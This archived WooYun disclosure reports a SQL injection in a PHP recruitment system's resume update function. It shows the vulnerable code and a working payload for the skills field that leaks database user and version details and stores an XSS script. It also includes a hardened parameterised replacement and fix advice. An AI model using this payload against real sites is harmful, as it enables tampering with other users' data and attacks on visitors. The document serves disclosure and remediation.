WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-08-09: Details reported to the vendor, awaiting vendor handling
2014-08-09: Vendor confirmed; details disclosed to the vendor only
2014-08-19: Details disclosed to core white hats and domain experts
2014-08-29: Details disclosed to ordinary white hats
2014-09-08: Details disclosed to intern white hats
2014-09-23: Details disclosed to the public
v3.4 20140808
include/common.fun.php
function updatetable($tablename, $setsqlarr, $wheresqlarr, $silent=0) {
    global $db;
    $setsql = $comma = '';
    foreach ($setsqlarr as $set_key => $set_value) {
        if(is_array($set_value)) {
            // if the value is an array, take its first element
            $setsql .= $comma.'`'.$set_key.'`'.'='.$set_value[0];      // no quotes
        } else {
            $setsql .= $comma.'`'.$set_key.'`'.'=\''.$set_value.'\'';  // quoted
        }
        $comma = ', ';
    }
    $where = $comma = '';
    if(empty($wheresqlarr)) {
        $where = '1';
    } elseif(is_array($wheresqlarr)) {
        foreach ($wheresqlarr as $key => $value) {
            $where .= $comma.'`'.$key.'`'.'=\''.$value.'\'';
            $comma = ' AND ';
        }
    } else {
        $where = $wheresqlarr;
    }
    return $db->query("UPDATE ".($tablename)." SET ".$setsql." WHERE ".$where, $silent?"SILENT":"");
}
user/personal/personal_resume.php, line 284:
elseif ($act=='make3_save'){
    if (intval($_POST['pid'])==0 ) showmsg('参数错误!',1);
    // specialty can be submitted as an array
    $setsqlarrspecialty['specialty']=!empty($_POST['specialty'])?$_POST['specialty']:showmsg('请填写您的技能特长!',1);
    $_CFG['audit_edit_resume']!="-1"?$setsqlarrspecialty['audit']=intval($_CFG['audit_edit_resume']):"";
    // the array value reaches the query unquoted
    updatetable(table('resume'),$setsqlarrspecialty," id='".intval($_POST['pid'])."' AND uid='".intval($_SESSION['uid'])."'");
    updatetable(table('resume_tmp'),$setsqlarrspecialty," id='".intval($_POST['pid'])."' AND uid='".intval($_SESSION['uid'])."'");
    check_resume($_SESSION['uid'],intval($_REQUEST['pid']));
    if ($_POST['go_resume_show']) {
        header("Location: ?act=resume_show&pid={$_POST['pid']}");
    } else {
        header("Location: ?act=make4&pid=".intval($_POST['pid']));
    }
}
Because an array value is spliced into the SET clause without quotes, this injection can modify any user's resume without authorization, or store XSS. In the "skills and specialties" field of the personal resume, enter:
concat(user(),0x0a,version(),0x0a,0x3C7363726970743E616C657274282F7873732F293C2F7363726970743E)
The input filter function cannot be bypassed directly, so the only route is this second-order injection through the array branch.
Quote and filter the values.
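The root cause in both snippets above is that updatetable() trusts the PHP type of a request value: a string is quoted, an array is spliced in raw via $value[0]. The following is an added example, not code from the original report or from the affected project, showing a hardened replacement that rejects non-scalar values and binds every value as a PDO parameter, so the database never sees request data as SQL text. The function names buildUpdate, scalarOrFail, quoteIdent and runUpdate are hypothetical; the table and column names (resume, specialty, id, uid) are taken from the report. Unlike the original helper, the WHERE clause must be an associative array, which also removes the raw-string WHERE branch.

```php
<?php
// Added example (not the original project's code): a hardened replacement for
// updatetable() that refuses non-scalar values and emits a parameterised
// UPDATE for PDO instead of concatenating values into the SQL string.

function scalarOrFail(string $field, $value): string
{
    // The original bug: an array value is spliced in unquoted via $value[0].
    // Here anything that is not a string/int/float/bool is rejected outright.
    if (!is_scalar($value)) {
        throw new InvalidArgumentException(
            "field '$field' must be scalar, got " . gettype($value));
    }
    return (string)$value;
}

function quoteIdent(string $name): string
{
    // Table and column names cannot be bound as parameters, so whitelist them.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name)) {
        throw new InvalidArgumentException("invalid identifier '$name'");
    }
    return '`' . $name . '`';
}

/**
 * Build "UPDATE `t` SET `a`=?, `b`=? WHERE `id`=? AND `uid`=?" plus its
 * positional parameter list. $where must be an associative array; the
 * original's raw-string WHERE branch is deliberately not supported.
 */
function buildUpdate(string $table, array $set, array $where): array
{
    $assign = [];
    $params = [];
    foreach ($set as $col => $val) {
        $assign[] = quoteIdent($col) . '=?';
        $params[] = scalarOrFail($col, $val);
    }
    if (!$assign) {
        throw new InvalidArgumentException('nothing to update');
    }
    $cond = [];
    foreach ($where as $col => $val) {
        $cond[] = quoteIdent($col) . '=?';
        $params[] = scalarOrFail($col, $val);
    }
    if (!$cond) {
        throw new InvalidArgumentException('refusing UPDATE without a WHERE clause');
    }
    $sql = 'UPDATE ' . quoteIdent($table) . ' SET ' . implode(', ', $assign)
         . ' WHERE ' . implode(' AND ', $cond);
    return [$sql, $params];
}

// Executes the built statement; $db is any connected PDO handle (assumed).
function runUpdate(PDO $db, string $table, array $set, array $where): int
{
    [$sql, $params] = buildUpdate($table, $set, $where);
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->rowCount();
}

// --- demo with constructed input; no database connection needed ---
// 1. Normal string input becomes a bound parameter, never part of the SQL text.
[$sql, $params] = buildUpdate('resume',
    ['specialty' => "Python, C, 'quotes' are fine"], ['id' => 7, 'uid' => 3]);
echo $sql, PHP_EOL;   // UPDATE `resume` SET `specialty`=? WHERE `id`=? AND `uid`=?
print_r($params);

// 2. The report's trick: specialty[] submitted as an array (constructed sample).
//    The original helper would splice $value[0] in unquoted; this one refuses.
$postedArray = ['specialty' => ['concat(user(),0x0a,version())']];
try {
    buildUpdate('resume', $postedArray, ['id' => 7, 'uid' => 3]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

In the handler, the same check belongs at the edge as well: treat $_POST['specialty'] as invalid unless is_string() holds, and keep the uid condition bound to $_SESSION['uid'] so a resume can only be updated by its owner. Binding parameters removes the SQL injection; the stored XSS half of the report is neutralised separately by escaping the field with htmlspecialchars() wherever it is rendered.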
Severity: High
Vulnerability Rank: 18
Confirmed at: 2014-08-09 17:41
Thank you for the submitted vulnerability and fix suggestion!
None yet